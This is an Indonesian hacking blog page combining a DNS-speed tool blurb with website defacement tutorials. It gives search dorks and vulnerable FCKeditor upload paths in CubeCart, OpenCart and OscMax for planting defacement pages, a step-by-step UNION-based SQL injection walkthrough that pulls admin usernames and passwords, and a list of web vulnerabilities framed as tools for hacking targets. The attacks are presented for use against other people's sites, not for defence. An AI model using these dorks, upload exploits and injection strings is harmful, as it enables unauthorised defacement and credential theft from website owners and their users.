PERTAMA KALI DOWNLOAD "NAMEBENCH" ( Mempercepat Koneksi Modem )
Penasarankan apa itu "Namebench"
Namebench adalah tools untuk membantu kita mendapatkan server DNS terbaik dan tercepat, sehingga kita dapat meningkatkan internet speed kita hingga ±67%. Dengan menemukan DNS yang sesuai bagi komputer kita masing-masing. Jika kita kemarin telah mengetahui Google Public DNS dapat mempercepat speed browsing kita, bisa saja DNS yang ditemukan cocok oleh Namebench akan membuat speed internet kita jauh lebih cepat dibandingkan dengan menggunakan Google Public DNS.
Ok langsung saja tanpa basa-basi, biar nggak penasaran lagi
Download File Namebench ▼
Cara Mempercepat Modem
Deface Website Full Version By Rizky Nightmare
Teknik Deface Full Version
Assalamualaikum..teman-teman.
Saya mau menampilkan lagi teknik deface :D
Kali ini, saya akan memberikan kpada anda smua tekniknya.
Disini saya akan membahas 4 teknik deface yang mngkin di pakai defacer.
Saya termasuk Org yg anti mnggunkan tools pada saat mendeface website :D
Okay,
1. Powered by CubeCard.
2. Powered By OpenCart
3. Powered By OscMax V 2.0
4. Connector Txt
1. Powered CubeCart
Adalah module Deface Upload file, kita bisa menggunakan cara ini.
Dork : Powered By CubeCart V 3.0
Exploit : /admin/includes/rte/editor/filemanager/browser/default/connectors/test.html
Contoh: www.test.com/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html
2. Powered By OpenCart
Dork : Powered By OpenCart
Exploit: admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Contoh : www.asu.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
3. Powered By OscMax V 2.0
Dork : Powered By OscMax V 2.0
Exploit : FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh ;www.cekcu.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
4. Hacking TXt.
Hacking Txt ini sama saja dengan Konsep 3 di atas it, cuma bedany khusus fiile txt saja yg bisa di upload, bentuk file lain tdk akan mnerima :D
Dork : Inurl:/FCKeditor/editor/filemanager/
Exploit : /FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh: www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
Semua yang saya tulis adalah dalam bntuk FCkeditor, khusus upload file :D
Cara pakainya:
1. Connector >> Pilih "PHP"
2. Klik Upload.
3. Jika Berhasil ada tulisa "file upload No eror"
4. Buka Get Folder utk mndptkan patch URL
5. Jika sudah, ketik nama file yg anda upload td.
Contoh : www.contoh.com/userFiles/fille/katon.html ato www.contoh.com/rizky.html
Deface Web Menggunakan SQL Injection ( Deface Web )
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
===========
=step Satu:=
===========
carilah target
misal:
Code:
[site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
Code:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
sehingga muncul pesan error.
==========
=step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh:
Code:
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal:
Code:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal:
Code:
[site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8
menjadi :
Code:
[site]/berita.php?id=-100+order+by+8--
===========
=step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka:
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal:
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah
Code:
From+Information_schema..
============
=step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
seumpama table yang muncul adalah "admin"
===========
=step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
=============
= step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
==============
= step Delapan:=
==============
tahap terakhir mencari halam admin atau login :piss: tapi saya sarankan memakai schemafuzz.py untuk hasil yg lebih maksimal.
TOOL WEB VULNERABILITIES ( Deface Web )
Nah ini diaa kumpulan tool hack atau untuk menemukan kerentanan dalam keamanan web2 kita ataupun web yg mau di jadikan target untuk di hack. SILAHKAN DI COBA Yah Bradder
- Backup files Security Vulnerability
- Blind SQL/XPath injection Security Vulnerability
- Code execution Security Vulnerability
- Common files Security Vulnerability
- Cookie manipulation Security Vulnerability
- CRLF injection/HTTP response splitting Security Vulnerability
- Cross Site Scripting Security Vulnerability
- Cross Site Scripting in path Security Vulnerability
- Cross Site Scripting in URI Security Vulnerability
- DELETE Method Enabled Security Vulnerability
- Directories with executables permission enabled Security Vulnerability
- Directories with write permissions enabled Security Vulnerability
- Directory Listing Security Vulnerability
- Directory Traversal Security Vulnerability
- Email address found Security Vulnerability
- File inclusion Security Vulnerability
- Full path disclosure Security Vulnerability
- Possible sensitive files Security Vulnerability
- PUT Method Enabled Security Vulnerability
- Script source code disclosure Security Vulnerability
- Sensitive data not encrypted Security Vulnerability
- Source code disclosure Security Vulnerability
- SQL injection Security Vulnerability
- TRACE method is enabled Security Vulnerability
- TRACK method is enabled Security Vulnerability
- Trojan shell script Security Vulnerability
- URL redirection Security Vulnerability
- XFS vulnerability Security Vulnerability
- XPath Injection vulnerability Security Vulnerability












